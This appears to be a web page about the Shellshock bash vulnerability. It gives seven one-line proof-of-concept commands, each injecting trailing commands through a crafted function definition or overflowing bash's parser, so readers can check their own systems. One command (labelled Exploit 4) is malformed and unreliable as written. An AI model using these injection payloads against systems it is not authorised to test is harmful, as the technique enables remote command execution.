bash-post-image

Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU’s bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in since Tue Sep 30 2014: 1:32PM EST (See patch history), you’re most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.

Exploit 1 (CVE-2014-6271)

There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you see “vulnerable” you need to update bash. Otherwise, you should be good to go.


Exploit 2 (CVE-2014-7169)

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.


Exploit 3 (???)

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env X=' () { }; echo hello' bash -c 'date'

If the above command outputs “hello”, you are vulnerable.


Exploit 4 (CVE-2014-7186)

bash -c 'true < echo "CVE-2014-7186 vulnerable, redir_stack"

A vulnerable system will echo the text “CVE-2014-7186 vulnerable, redir_stack”.


Exploit 5 (CVE-2014-7187)

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
 echo "CVE-2014-7187 vulnerable, word_lineno"

A vulnerable system will echo the text “CVE-2014-7187 vulnerable, word_lineno”.


Exploit 6 (CVE-2014-6278)

shellshocker='() { echo You are vulnerable; }' bash -c shellshocker

You shouldn’t see “You are vulnerable”, if you’re patched you will see “bash: shellshocker: command not found”


Exploit 7 (CVE-2014-6277)

bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable

If the command outputs “vulnerable”, you are vulnerable.